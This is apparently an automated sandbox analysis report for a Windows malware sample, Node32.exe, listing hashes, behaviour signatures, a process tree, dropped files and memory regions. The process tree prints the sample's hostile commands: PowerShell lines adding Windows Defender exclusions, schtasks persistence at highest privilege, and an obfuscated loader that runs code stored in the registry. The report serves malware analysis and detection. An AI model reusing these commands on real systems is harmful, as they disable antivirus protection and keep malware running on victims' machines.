Analysis

  • max time kernel
    150s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 17:33

General

  • Target

    tmpfile-main/Node32.exe

  • Size

    366KB

  • MD5

    31be6f6a2cbf1c49790b490df463500a

  • SHA1

    878a2fee90a2ceb49213a5b5742499ca8e14fec0

  • SHA256

    6d4222db12dd717bef62cabc134fbbdad8033767780eeb6d7322a38b8a2a81de

  • SHA512

    8b3c2e96ee85502d4ebd750e94397915370f47543cb7ce0c0b598407319387727678daac28dd843f0d61685b83fb8597cf473091774cdf74cdc9dd98f9a06d37

  • SSDEEP

    6144:NClTCNaC5liBrWdzoRQJx9LDmaAF5kDERQp+QDW9WkkHp683KX:NUolitMIaAFkJ6

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{a6a2eb6c-5afd-4f04-abc5-cbfba2969b45}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1936
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:476
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:600
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1364
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:824
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS
              2⤵
                PID:676
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                2⤵
                • Modifies security service
                PID:748
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:816
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1160
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:848
                    • C:\Windows\system32\wbem\WMIADAP.EXE
                      wmiadap.exe /F /T /R
                      3⤵
                      • Drops file in System32 directory
                      PID:2548
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {AADDA536-9B83-4071-BBE6-7DC8406F0B05} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2728
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'N'+[Char](111)+'de'+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
                        4⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2684
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:968
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:268
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:344
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                          2⤵
                            PID:1064
                          • C:\Windows\system32\taskhost.exe
                            "taskhost.exe"
                            2⤵
                              PID:1108
                            • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                              "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                              2⤵
                                PID:1668
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                2⤵
                                  PID:2264
                                • C:\Windows\system32\sppsvc.exe
                                  C:\Windows\system32\sppsvc.exe
                                  2⤵
                                    PID:2352
                                • C:\Windows\system32\lsass.exe
                                  C:\Windows\system32\lsass.exe
                                  1⤵
                                    PID:488
                                  • C:\Windows\system32\lsm.exe
                                    C:\Windows\system32\lsm.exe
                                    1⤵
                                      PID:496
                                    • C:\Windows\Explorer.EXE
                                      C:\Windows\Explorer.EXE
                                      1⤵
                                        PID:1204
                                        • C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe
                                          "C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe"
                                          2⤵
                                          • Adds Run key to start application
                                          • Drops file in System32 directory
                                          • Suspicious use of WriteProcessMemory
                                          PID:2936
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
                                            3⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2308
                                          • C:\Windows\System32\schtasks.exe
                                            "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
                                            3⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2316
                                          • C:\Windows\System32\$Node32.exe
                                            "C:\Windows\System32\$Node32.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:2724
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
                                            3⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2824
                                          • C:\Windows\System32\schtasks.exe
                                            "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
                                            3⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2600
                                          • C:\Windows\System32\$Node2Json.exe
                                            "C:\Windows\System32\$Node2Json.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:2716
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
                                            3⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3040
                                          • C:\Windows\System32\schtasks.exe
                                            "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
                                            3⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1080
                                          • C:\Windows\System32\$Node3Json.exe
                                            "C:\Windows\System32\$Node3Json.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1236

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\149ZXZSEBRN2BB9TPQ15.temp

                                        Filesize

                                        7KB

                                        MD5

                                        1058e26343e90ebfb06df1e608d3cc26

                                        SHA1

                                        8f52d343194328d354c7feda26f397112c1322a0

                                        SHA256

                                        415182e5d7b298851f32111975e08c0279c5dcc33f0a477747ddd3c62eb011eb

                                        SHA512

                                        d91b26925493797b8f6888327a07be153495d9ae9a16c7e436c2f3119e599231824b10fb97736af4b66f46603920300ee7f2b390b986bfc06b245d6ea7fdd0ba

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                        Filesize

                                        7KB

                                        MD5

                                        0847944aeee760d9e3d8bed89cac7c09

                                        SHA1

                                        26e5b33bc4a55ba19417f81d9c027d9cdafbabc0

                                        SHA256

                                        7d6908f9522888923d83618f8df1151af83643b7dedec21af5ad838ad7cad722

                                        SHA512

                                        9b365f54ed8a90a869d4fd4c892540c59dd90856722d3a3e0da11640df75701b609657a88914c1dddd961401cc99c936740aca51e5d3b5c35ec23baa04863a15

                                      • C:\Windows\System32\$Node2Json.exe

                                        Filesize

                                        116KB

                                        MD5

                                        41814c2aa6f0aaffaaaa26ffd07b3550

                                        SHA1

                                        ea9731c42a382ed003b5b4bfd28c3ba437c8d14a

                                        SHA256

                                        da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e

                                        SHA512

                                        f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d

                                      • C:\Windows\System32\$Node32.exe

                                        Filesize

                                        163KB

                                        MD5

                                        b850f016450d68da0ae4bb945355f70c

                                        SHA1

                                        521726c38af715e6ee1c76315151f0ed9518c6f4

                                        SHA256

                                        8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24

                                        SHA512

                                        30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c

                                      • C:\Windows\System32\$Node3Json.exe

                                        Filesize

                                        117KB

                                        MD5

                                        391d4f99d0076ce566b370f1572ef670

                                        SHA1

                                        0bf04beb77440315098bacf30563a6542e254a45

                                        SHA256

                                        b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605

                                        SHA512

                                        1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497

                                      • memory/432-59-0x0000000037CA0000-0x0000000037CB0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/432-52-0x0000000000BA0000-0x0000000000BCA000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/432-57-0x0000000000BA0000-0x0000000000BCA000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/432-50-0x0000000000B70000-0x0000000000B95000-memory.dmp

                                        Filesize

                                        148KB

                                      • memory/432-58-0x000007FEBEC00000-0x000007FEBEC10000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/432-51-0x0000000000BA0000-0x0000000000BCA000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/432-48-0x0000000000B70000-0x0000000000B95000-memory.dmp

                                        Filesize

                                        148KB

                                      • memory/476-72-0x0000000037CA0000-0x0000000037CB0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/476-65-0x0000000000D40000-0x0000000000D6A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/476-71-0x000007FEBEC00000-0x000007FEBEC10000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/476-70-0x0000000000D40000-0x0000000000D6A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/488-78-0x0000000000100000-0x000000000012A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/488-84-0x000007FEBEC00000-0x000007FEBEC10000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/488-83-0x0000000000100000-0x000000000012A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/488-85-0x0000000037CA0000-0x0000000037CB0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/496-91-0x0000000000450000-0x000000000047A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/496-96-0x0000000000450000-0x000000000047A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/496-97-0x000007FEBEC00000-0x000007FEBEC10000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/496-98-0x0000000037CA0000-0x0000000037CB0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1236-153-0x0000000000AF0000-0x0000000000B12000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/1936-38-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/1936-43-0x0000000077C60000-0x0000000077E09000-memory.dmp

                                        Filesize

                                        1.7MB

                                      • memory/1936-37-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/1936-42-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/1936-44-0x0000000077B40000-0x0000000077C5F000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1936-39-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/1936-40-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/1936-45-0x0000000140000000-0x0000000140008000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/2308-8-0x00000000022C0000-0x00000000022C8000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/2308-7-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

                                        Filesize

                                        2.9MB

                                      • memory/2308-6-0x0000000002A60000-0x0000000002AE0000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2684-36-0x0000000077B40000-0x0000000077C5F000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/2684-35-0x0000000077C60000-0x0000000077E09000-memory.dmp

                                        Filesize

                                        1.7MB

                                      • memory/2684-29-0x000000001A350000-0x000000001A37A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/2716-28-0x0000000001340000-0x0000000001362000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/2824-21-0x0000000002720000-0x0000000002728000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/2824-20-0x000000001B600000-0x000000001B8E2000-memory.dmp

                                        Filesize

                                        2.9MB

                                      • memory/2936-0-0x000007FEF62E3000-0x000007FEF62E4000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/2936-1-0x0000000000CC0000-0x0000000000D22000-memory.dmp

                                        Filesize

                                        392KB